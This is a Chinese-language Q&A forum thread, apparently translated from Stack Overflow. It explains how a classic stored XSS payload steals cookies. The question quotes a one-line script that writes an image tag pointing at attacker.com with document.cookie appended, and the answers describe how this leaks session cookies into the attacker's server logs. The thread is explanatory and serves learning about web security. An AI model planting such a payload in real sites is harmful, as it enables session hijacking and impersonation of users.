【问题标题】:Question on a type of XSS attack关于一种XSS攻击的问题
【发布时间】:2010-04-12 19:43:00
【问题描述】:

引用自http://xss-proxy.sourceforge.net/Advanced_XSS_Control.txt


正如这里的许多人可能知道的那样,当前的 XSS 攻击通常有两种形式: 1 - 攻击者将标签上传到公共公告板、博客或其他网站 有一个 XSS 漏洞,许多其他用户会访问。攻击者正常 收集站点 cookie 以供以后冒充用户,但表单提交和其他攻击 有时会被利用。这就是我交谈过的许多人认为 XSS 的原因。 这是一个例子:

有人会在 evilblog.com 上发布以下内容供其他用户处理

<script>document.write("<img src=http://attacker.com/” + document.cookie + “>”)</script>

这将尝试使用用户的 evilblog 从攻击者的服务器上提取图像 URL 中的 cookie。


我的问题:

我不明白上面写的 图像 URL 路径 的目的/结果。谁能详细说明一下?

PS:“这将尝试使用 URL 中用户的 evilblog cookie 从攻击者的服务器上提取图像”是什么意思

【问题讨论】:

    标签: xss


    【解决方案1】:

    document.write() 只是向站点添加一个 img-tag,浏览器将尝试从该 URL 加载图像。

    当脚本和框架来自不同的域时,它们有时会被阻止,因此在这种情况下 XSS 攻击会失败。图像通常是允许的,因为无论如何许多网站都会显示来自不同主机的图像,因此 XSS 攻击会成功。

    结果是攻击者日志中包含 cookie 信息的条目,由于它通常不返回任何内容,因此它被解释为损坏的图像,因此大多数浏览器不显示任何内容,并且用户不会怀疑任何内容。

    【讨论】:

    • 对图像使用的清晰解释。谢谢。
    【解决方案2】:

    目的是让浏览器自动检索图像;在示例中,cookie 详细信息在该 URL 的查询字符串中设置,因此攻击者获取 URL,获取 cookie,从而获取身份验证所需的详细信息。

    【讨论】:

    • 那么“attacker.com”是用来被攻击的吗?
    • @Ricky:不,attacker.com 是一个由攻击者控制的网站。因此,他们将查看其站点的 HTTP 日志,并在那里(在 他们的 站点上)查看请求的详细信息(即经过身份验证的 cookie 详细信息)。
    【解决方案3】:

    简单。它向包含请求 URL 中的 cookie 的敌对域发起请求。

    【讨论】:

      猜你喜欢
      • 1970-01-01
      • 2010-11-08
      • 1970-01-01
      • 2022-01-08
      • 2011-02-16
      • 1970-01-01
      • 1970-01-01
      相关资源
      最近更新 更多